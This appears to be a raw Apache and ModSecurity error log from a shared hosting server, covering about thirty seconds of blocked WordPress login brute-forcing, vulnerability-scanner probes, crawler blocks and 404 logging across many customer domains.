[Tue May 26 13:46:04.351786 2026] [core:error] [pid 544395:tid 544626] [client 38.62.229.224:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:06.572589 2026] [security2:error] [pid 544395:tid 544652] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWxhmrs7g3RMCdp8XljAAAAH8"]
[Tue May 26 13:46:07.073272 2026] [security2:error] [pid 544395:tid 544574] [client 45.94.139.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVWxhmrs7g3RMCdp8XlkAAAADE"]
[Tue May 26 13:46:07.804880 2026] [security2:error] [pid 544395:tid 544565] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWxxmrs7g3RMCdp8XlogAAACg"]
[Tue May 26 13:46:08.366281 2026] [core:error] [pid 536875:tid 537039] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:08.366308 2026] [core:error] [pid 536875:tid 537039] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:08.366442 2026] [security2:error] [pid 536875:tid 537039] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVWyOr_-FTveSGlx1H_zAAAAKc"]
[Tue May 26 13:46:08.367012 2026] [security2:error] [pid 544395:tid 544607] [client 195.178.110.34:53978] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVWyBmrs7g3RMCdp8XlswAAAFI"]
[Tue May 26 13:46:08.454246 2026] [security2:error] [pid 544395:tid 544527] [client 106.192.248.115:57441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWyBmrs7g3RMCdp8XlsAAAAAI"]
[Tue May 26 13:46:08.454390 2026] [security2:error] [pid 544395:tid 544527] [client 106.192.248.115:57441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWyBmrs7g3RMCdp8XlsAAAAAI"]
[Tue May 26 13:46:09.161971 2026] [security2:error] [pid 536875:tid 537128] [client 172.226.42.163:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVWyOr_-FTveSGlx1H_1AAAAQA"]
[Tue May 26 13:46:09.522915 2026] [security2:error] [pid 536875:tid 537132] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWyer_-FTveSGlx1H_1QAAAQQ"]
[Tue May 26 13:46:12.018861 2026] [security2:error] [pid 536875:tid 537116] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWy-r_-FTveSGlx1H_8gAAAPQ"]
[Tue May 26 13:46:12.306869 2026] [core:error] [pid 544395:tid 544557] [client 82.24.212.131:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:12.306893 2026] [core:error] [pid 544395:tid 544557] [client 82.24.212.131:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:12.631775 2026] [security2:error] [pid 544395:tid 544535] [client 157.45.241.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWzBmrs7g3RMCdp8Xl5wAAAAo"]
[Tue May 26 13:46:13.580332 2026] [security2:error] [pid 544395:tid 544571] [client 129.222.147.134:38678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWzRmrs7g3RMCdp8Xl_AAAAC4"]
[Tue May 26 13:46:13.580527 2026] [security2:error] [pid 544395:tid 544571] [client 129.222.147.134:38678] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWzRmrs7g3RMCdp8Xl_AAAAC4"]
[Tue May 26 13:46:14.058768 2026] [security2:error] [pid 544395:tid 544550] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWzRmrs7g3RMCdp8XmAwAAABk"]
[Tue May 26 13:46:14.577018 2026] [security2:error] [pid 544395:tid 544608] [client 195.178.110.34:58530] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVWzhmrs7g3RMCdp8XmGgAAAFM"]
[Tue May 26 13:46:15.661120 2026] [security2:error] [pid 544395:tid 544624] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWzxmrs7g3RMCdp8XmJAAAAGM"]
[Tue May 26 13:46:15.926748 2026] [security2:error] [pid 544395:tid 544622] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "pcc.co.me"] [uri "/index.php"] [unique_id "ahVWzxmrs7g3RMCdp8XmNAAAAGE"]
[Tue May 26 13:46:16.983632 2026] [security2:error] [pid 536875:tid 536946] [remote 111.229.141.137:43772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVW0Or_-FTveSGlx1EAQAAA_UY"]
[Tue May 26 13:46:17.373244 2026] [security2:error] [pid 544395:tid 544544] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW0Bmrs7g3RMCdp8XmPwAAABM"]
[Tue May 26 13:46:18.642269 2026] [security2:error] [pid 536875:tid 537051] [client 106.192.248.115:57754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW0ur_-FTveSGlx1EAWQAAALM"]
[Tue May 26 13:46:18.642479 2026] [security2:error] [pid 536875:tid 537051] [client 106.192.248.115:57754] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW0ur_-FTveSGlx1EAWQAAALM"]
[Tue May 26 13:46:18.944063 2026] [security2:error] [pid 544395:tid 544399] [remote 5.78.119.122:49280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVW0hmrs7g3RMCdp8XmXAAARwM"]
[Tue May 26 13:46:19.449963 2026] [security2:error] [pid 544395:tid 544646] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW0xmrs7g3RMCdp8XmZgAAAHk"]
[Tue May 26 13:46:19.965702 2026] [security2:error] [pid 544395:tid 544575] [client 208.91.198.85:38198] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVW0xmrs7g3RMCdp8XmbAAAADI"], referer: https://www.bloggertarget.com
[Tue May 26 13:46:20.023896 2026] [security2:error] [pid 544395:tid 544563] [client 195.178.110.34:59966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVW1Bmrs7g3RMCdp8XmdQAAACY"]
[Tue May 26 13:46:20.132256 2026] [security2:error] [pid 544395:tid 544551] [client 208.91.198.85:37158] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVW0xmrs7g3RMCdp8XmdAAAABo"], referer: https://www.bloggertarget.com
[Tue May 26 13:46:20.198412 2026] [security2:error] [pid 544395:tid 544602] [client 114.119.138.130:44885] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/2013/10/14"] [unique_id "ahVW1Bmrs7g3RMCdp8XmdwAAAE0"], referer: http://www.anujtradingco.com/product-tag/black/page/12?orderby=date
[Tue May 26 13:46:20.997217 2026] [security2:error] [pid 536875:tid 537113] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW1Or_-FTveSGlx1EAdQAAAPE"]
[Tue May 26 13:46:23.132918 2026] [security2:error] [pid 536875:tid 537012] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW1ur_-FTveSGlx1EAhgAAAIw"]
[Tue May 26 13:46:23.407136 2026] [security2:error] [pid 544395:tid 544519] [remote 47.128.47.13:11114] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahVW1xmrs7g3RMCdp8XmrwAARns"]
[Tue May 26 13:46:23.694514 2026] [security2:error] [pid 536875:tid 537090] [client 129.222.147.134:3854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW1-r_-FTveSGlx1EAmwAAANo"]
[Tue May 26 13:46:23.694721 2026] [security2:error] [pid 536875:tid 537090] [client 129.222.147.134:3854] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVW1-r_-FTveSGlx1EAmwAAANo"]
[Tue May 26 13:46:23.870437 2026] [security2:error] [pid 536875:tid 536916] [remote 173.252.87.3:40090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.87.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVW1-r_-FTveSGlx1EAngAAsig"]
[Tue May 26 13:46:24.100422 2026] [fcgid:warn] [pid 536875:tid 537084] (70014)End of file found: [client 66.132.172.101:38462] mod_fcgid: can't get data from http client
[Tue May 26 13:46:24.313446 2026] [security2:error] [pid 536875:tid 537100] [client 114.119.159.152:20463] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/a-symbol-that-changed-the-face-of-modern-communication/"] [unique_id "ahVW2Or_-FTveSGlx1EArgAAAOQ"], referer: https://moes-art.com/blog/
[Tue May 26 13:46:24.686658 2026] [security2:error] [pid 536875:tid 537035] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW2Or_-FTveSGlx1EArAAAAKM"]
[Tue May 26 13:46:24.976292 2026] [security2:error] [pid 536875:tid 537019] [client 4.201.75.230:5619] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wk/index.php"] [unique_id "ahVW2Or_-FTveSGlx1EAwQAAAJM"]
[Tue May 26 13:46:24.999707 2026] [security2:error] [pid 536875:tid 537106] [client 177.220.226.126:56420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVW2Or_-FTveSGlx1EAvAAAAOo"]
[Tue May 26 13:46:25.604048 2026] [security2:error] [pid 544395:tid 544521] [remote 173.252.70.26:56082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 26.70.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVW2Rmrs7g3RMCdp8XmuwAAA30"]
[Tue May 26 13:46:25.746344 2026] [security2:error] [pid 544395:tid 544520] [remote 173.252.87.36:50312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.87.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVW2Rmrs7g3RMCdp8XmvQAAS3w"]
[Tue May 26 13:46:25.858237 2026] [security2:error] [pid 544395:tid 544610] [client 114.119.139.220:40975] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/gizlilik-ve-guvenlik-politikasi/"] [unique_id "ahVW2Rmrs7g3RMCdp8XmwAAAAFU"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 13:46:25.869906 2026] [security2:error] [pid 544395:tid 544652] [client 195.178.110.34:33418] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVW2Rmrs7g3RMCdp8XmwQAAAH8"]
[Tue May 26 13:46:26.474082 2026] [security2:error] [pid 536875:tid 537111] [client 4.201.75.230:5598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/inputs.php"] [unique_id "ahVW2ur_-FTveSGlx1EA3gAAAO8"]
[Tue May 26 13:46:26.857101 2026] [security2:error] [pid 536875:tid 537044] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW2ur_-FTveSGlx1EA3QAAAKw"]
[Tue May 26 13:46:28.412790 2026] [security2:error] [pid 536875:tid 537048] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW2-r_-FTveSGlx1EBAAAAALA"]
[Tue May 26 13:46:29.099908 2026] [security2:error] [pid 536875:tid 537049] [client 106.192.248.115:58230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW3er_-FTveSGlx1EBHAAAALE"]
[Tue May 26 13:46:29.100025 2026] [security2:error] [pid 536875:tid 537049] [client 106.192.248.115:58230] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVW3er_-FTveSGlx1EBHAAAALE"]
[Tue May 26 13:46:29.137866 2026] [security2:error] [pid 536875:tid 537115] [client 4.201.75.230:5604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/ioxi-o.php"] [unique_id "ahVW3er_-FTveSGlx1EBHQAAAPM"]
[Tue May 26 13:46:29.146027 2026] [security2:error] [pid 536875:tid 536879] [remote 88.198.91.116:54384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVW3Or_-FTveSGlx1EBGQAAhwM"]
[Tue May 26 13:46:29.208319 2026] [security2:error] [pid 544395:tid 544408] [remote 14.161.17.36:51588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVW3Rmrs7g3RMCdp8XnAAAASQw"]
[Tue May 26 13:46:30.154589 2026] [security2:error] [pid 536875:tid 537011] [client 177.220.226.126:54977] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVW3ur_-FTveSGlx1EBNQAAAIs"], referer: https://filosha.com/wp-login.php
[Tue May 26 13:46:30.463966 2026] [security2:error] [pid 536875:tid 537097] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVW3ur_-FTveSGlx1EBOQAAAOE"]
[Tue May 26 13:46:31.027078 2026] [security2:error] [pid 536875:tid 537074] [client 4.201.75.230:5576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/function/function.php"] [unique_id "ahVW3-r_-FTveSGlx1EBSQAAAMo"]
[Tue May 26 13:46:31.765770 2026] [security2:error] [pid 544395:tid 544625] [client 62.60.130.230:62371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/xmlrpc.php"] [unique_id "ahVW3xmrs7g3RMCdp8XnMwAAAGQ"]
[Tue May 26 13:46:32.092936 2026] [security2:error] [pid 544395:tid 544567] [client 62.60.130.230:62368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4Bmrs7g3RMCdp8XnRQAAACo"]
[Tue May 26 13:46:32.425552 2026] [security2:error] [pid 544395:tid 544579] [client 62.60.130.230:63870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4Bmrs7g3RMCdp8XnSgAAADY"]
[Tue May 26 13:46:32.754151 2026] [security2:error] [pid 544395:tid 544641] [client 62.60.130.230:53055] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4Bmrs7g3RMCdp8XnUQAAAHQ"]
[Tue May 26 13:46:32.779518 2026] [security2:error] [pid 536875:tid 536960] [remote 173.252.87.46:54632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.87.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVW4Or_-FTveSGlx1EBagAAvlQ"]
[Tue May 26 13:46:32.813842 2026] [security2:error] [pid 544395:tid 544536] [client 4.201.75.230:56263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deepakrohilla.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVW4Bmrs7g3RMCdp8XnUgAAAAs"]
[Tue May 26 13:46:33.123563 2026] [security2:error] [pid 544395:tid 544596] [client 62.60.130.230:57124] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "karuppuswamykovil.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVW4Rmrs7g3RMCdp8XnWwAAAEc"]
